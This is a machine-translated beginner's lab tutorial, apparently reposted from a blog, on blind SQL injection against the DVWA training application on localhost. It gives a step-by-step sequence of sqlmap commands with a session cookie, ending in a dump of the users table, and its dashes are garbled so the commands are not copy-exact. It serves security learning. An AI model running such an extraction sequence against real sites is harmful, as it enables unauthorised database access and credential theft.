My Way of Learning (a) SQL blind learning article

Source: Internet
Author: User

My way of learning, now 0 basis, is a small white, please daniel criticism! Write down this article, is a thought of their own collation, for reference only.

Dvwa Login, first in Dvwa Security set a level of low, and then into SQL injection (blind), randomly enter a number to grab the packet, and then find URL injection points and cookies. (the tool used for grasping the package is fiddler, so we don't go into the details of the packet capture process.)

650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M01/9B/8A/wKiom1lkUy_wK7csAABEXRSel14372.png-wh_500x0-wm_ 3-wmp_4-s_678261990.png "title=" 1.png "alt=" Wkiom1lkuy_wk7csaabexrsel14372.png-wh_50 "/>


then enter cmd interface for command parameter input:

The first step is to query the if the URL can be injected, the command parameters are as follows:

Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "

-u parameter is the specified URL--cookie= "Cookie value"

650) this.width=650; "Src=" https://s1.51cto.com/wyfs02/M01/9B/8A/wKioL1lkU03w2lo7AACnw55E1CY556.png-wh_500x0-wm_ 3-wmp_4-s_2080954333.png "title=" 2.png "alt=" Wkiol1lku03w2lo7aacnw55e1cy556.png-wh_50 "/>

The results were found to be injected.

The second step is to view all the databases:

Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–dbs

650) this.width=650; "Src=" https://s1.51cto.com/wyfs02/M00/9B/8A/wKiom1lkU3bhCRGtAAA4WHZ7tIA131.png-wh_500x0-wm_ 3-wmp_4-s_3494656188.png "title=" 3.png "alt=" Wkiom1lku3bhcrgtaaa4whz7tia131.png-wh_50 "/>

The third step is to view the current user:

Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–current-user

650) this.width=650; "Src=" https://s4.51cto.com/wyfs02/M00/9B/8A/wKioL1lkV3bTnOlbAAAdo4eciTY066.png-wh_500x0-wm_ 3-wmp_4-s_630102404.png "title=" 4.png "alt=" Wkiol1lkv3btnolbaaado4ecity066.png-wh_50 "/>

The Fourth step is to view all the tables in the database DVWA:

Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–D Dvwa--tables

650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M01/9B/8A/wKiom1lkV5fi1YA9AAAubDfkaAI056.png-wh_500x0-wm_ 3-wmp_4-s_4084334908.png "title=" 5.png "alt=" Wkiom1lkv5fi1ya9aaaubdfkaai056.png-wh_50 "/>

Fifth step to view the users table in the database , where -columns is the view of all columns of the current table

Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–D dvwa–t users--columns

650) this.width=650; "Src=" https://s4.51cto.com/wyfs02/M01/9B/8A/wKioL1lkV62ifCcVAAA6vNc0LrM218.png-wh_500x0-wm_ 3-wmp_4-s_3671177600.png "title=" 6.png "alt=" Wkiol1lkv62ifccvaaa6vnc0lrm218.png-wh_50 "/>

everyone through the previous steps are not waiting for patience, haha, but the results come out, or there is a sense of accomplishment oh. The sixth step, the last step,--dump the information for all columns.

Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–D dvwa–t users--dump

650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M02/9B/8A/wKiom1lkV8iyNQ-jAAAuNgnwynM691.png-wh_500x0-wm_ 3-wmp_4-s_320319171.png "title=" 7.png "alt=" Wkiom1lkv8iynq-jaaaungnwynm691.png-wh_50 "/>

Of course, the last picture does not cut into a complete picture oh, you can continue to enter the!!


This article is from the "learning Journey Ideas to organize" blog, please be sure to keep this source http://pieshusheng.blog.51cto.com/13106113/1946399

My Way of Learning (a) SQL blind learning article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.